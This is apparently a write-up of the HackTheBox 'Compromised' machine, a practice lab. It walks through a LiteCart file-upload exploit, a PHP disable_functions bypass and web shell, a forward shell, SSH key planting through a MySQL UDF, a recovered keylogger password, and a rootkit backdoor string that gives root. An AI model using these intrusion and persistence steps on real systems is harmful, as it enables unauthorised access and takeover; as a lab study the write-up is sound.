HackTheBox - Compromised

Nmap scan results

Adding compromised.htb to /etc/hosts file. Also starting off a all port scan in the background.

Using gobuster to scan for directories and files

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://compromised.htb/ -o go-dirscan.out -x php,html,tx

Using timestamps to get recently modified files

Now that we have backup files for the CMS running, we can potentially search for config files. There is this one trick that I learned from ippsec (Using timestamps to get the recently modified files)

find . -printf "%T+ %p\n" -type f | sort -u

2020-09-03+17:19:16.0000000000 ./includes/library
2020-09-03+17:19:16.0000000000 ./includes/library/lib_user.inc.php
2020-09-03+17:20:34.0000000000 ./admin/login.php
2020-09-03+17:20:56.0000000000 ./admin
// These were the recently modified files

<?php
  require_once('../includes/app_header.inc.php');

  document::$template = settings::get('store_template_admin');
  document::$layout = 'login';

  if (!empty($_GET['redirect_url'])) {
    $redirect_url = (basename(parse_url($_REQUEST['redirect_url'], PHP_URL_PATH)) != basename(__FILE__)) ? $_REQUEST['redirect_url'] : document::link(WS_DIR_ADMIN);
  } else {
    $redirect_url = document::link(WS_DIR_ADMIN);
  }

  header('X-Robots-Tag: noindex');
  document::$snippets['head_tags']['noindex'] = '<meta name="robots" content="noindex" />';

  if (!empty(user::$data['id'])) notices::add('notice', language::translate('text_already_logged_in', 'You are already logged in'));

  if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }

  if (empty($_POST['username']) && !empty($_SERVER['PHP_AUTH_USER'])) $_POST['username'] = !empty($_SERVER['PHP_AUTH_USER']) ? $_SERVER['PHP_AUTH_USER'] : '';

  $page_login = new view();
  $page_login->snippets = array(
    'action' => $redirect_url,
  );
  echo $page_login->stitch('pages/login');

  require_once vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_INCLUDES . 'app_footer.inc.php');

?>

if (isset($_POST['login'])) {
    //file_put_contents("./.log2301c9430d8593ae.txt", "User: " . $_POST['username'] . " Passwd: " . $_POST['password']);
    user::login($_POST['username'], $_POST['password'], $redirect_url, isset($_POST['remember_me']) ? $_POST['remember_me'] : false);
  }

The above code is logging the username and password for admin into .log2301c9430d8593ae.txt file. Maybe we can still access that file, let's try that.

User: admin Passwd: theNextGenSt0r3!~

Exploiting LiteCart (Vulnerable to Arbitrary File Upload)

Version Used : LiteCart 2.1.2

Upload a php file and change the Content-Type to application/xml.

Now visit http://compromised.htb/shop/vqmod/xml/demo.php and you should get the following page.

PHP disable_functions bypass

But the only problem is that we can't run system executing commands on php. This can be because of PHP disabled functions. To check it ,we can execute phpinfo() command.

There are two ways to get a shell on the box. The first way is to use weevely (Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.) and the another way is to use disable_functions bypass - PHP 7.0-7.4 script.

disable_functions bypass - PHP 7.0-7.4 (*nix only)HackTricks

Get the exploit from here and upload it. We can even modify the script a bit to accept a GET/POST request and execute it, rather than manually entering the values.

We can't get a reverse shell because of the firewall rules. To check the iptables rules, we can browse to /etc/iptables and list for rules.

# Generated by iptables-save v1.6.1 on Mon May 11 02:27:29 2020
*filter
:INPUT DROP [6:1032]
:FORWARD DROP [0:0]
:OUTPUT DROP [5:394]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -m tcp -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -m tcp -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 0 -j ACCEPT
-A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT
-A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -m tcp -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -m tcp -j ACCEPT
COMMIT
# Completed on Mon May 11 02:27:29 2020

Instead we can use forward shell.

GitHub - IppSec/forward-shellGitHub

Using forward shell to shell access

We can even upgrade the shell (Uses pty from python) by typing upgrade command.

The pty module defines operations for handling the pseudo-terminal concept: starting another process and being able to write to and read from its controlling terminal programmatically. ... Connect the child's controlling terminal to a pseudo-terminal. Return value is (pid, fd) .

Misconfiguration in MySQL

// Database Configs
  define('DB_TYPE', 'mysql');                                                                                                                                                                 
  define('DB_SERVER', 'localhost');                                                                                                                                                           
  define('DB_USERNAME', 'root');
  define('DB_PASSWORD', 'changethis');
  define('DB_DATABASE', 'ecom');
  define('DB_TABLE_PREFIX', 'lc_');
  define('DB_CONNECTION_CHARSET', 'utf8');
  define('DB_PERSISTENT_CONNECTIONS', 'false');

MySQL user has given a shell, usually it is set to /bin/false but now it is set to /bin/bash which is strange. That means we can SSH into that user.

mysql:x:111:113:MySQL Server,,,:/var/lib/mysql:/bin/bash

Let's see if mysql has UDF(User-defined functions) present. We have creds to connect.

Looks like we run commands as mysql user.

One thing that we can do is create a .ssh directory and then copy the contents of our public key into it. This is how we can get shell as mysql using SSH Protocol.

// Create a pair of SSH Keys
ssh-keygen -f mysql

select exec_cmd('mkdir .ssh');
select exec_cmd('echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCkB5LPkMjts3c9RE8ea1ftX+xMCA2ppgNYP5B1mxkW/3vR185WS+KamWjrTZ3NImNkWuC2MEn1og6aIUZ4R0jPvccHeX0urY2wH4AFnjKL6Hu03hra2HWt3ca2SgiKgKHjZUWWlVeow5tTlWSDgJQ12faugpn6sWfPYmPMX/iVIiCBRbURVRDQP+7c/MUCqEmtITwH8atCFNyjLHM7B9d210SJb+1eP++ZDydFFpd1bMhe79ABwHY5YC1Lm3h0cZTYjGicbwVp0RLIUIrtyz0Y8u/I+2nZyINLYEYeIUDavLBK/B/BrX8NgsQoH/n9cEboBKN+MSsaWYx3exIXB8chUZkoPQ4xff3qfiGYsO5xO2GnBscmkicGWTNOXKpGj9iYZTX654XtUBRBJwcJFuxg46i+9SNlkxj/xHLYeIHfBNPe+DyRgg2k/E4bTnzbC8La1Sa3CJpMUqzPWRwrhBeLrp2ThowNOuDYokjYBpeAu6tA2XyDPGfCZkhvntncV5U= root@LAPTOP-UFMALO92" > .ssh/authorized_keys');
select exec_cmd('chmod 600 .ssh/authorized_keys');

Analyzing the strace-log.dat (Keylogger)

This strace-dat.log file is logging all the keys, if you will observe it properly you can see a pattern. See the screenshot below.

mysql -u root --password 3*NLJE32I$Fe

Also the password for sysadmin : 3*NLJE32I$Fe

Exploiting LD_PRELOAD Rootkit (libdate.so)

We can analyze the libdate.so file in ghidra. Get that file using scp.

scp sysadmin@10.10.10.207:/lib/x86_64-linux-gnu/libdate.so .

So after reading the local_x variables, if it's equal then it will run /bin/sh command. Let's decode that variable values using Cyberchef.

Decoded Value : 2wkeOU4sjv84ok/

So upon execution of SUID Binary (binary should accept input from the user), if we enter the value that we just decoded, we will get a root shell. Let's try that on su (substitute user)binary.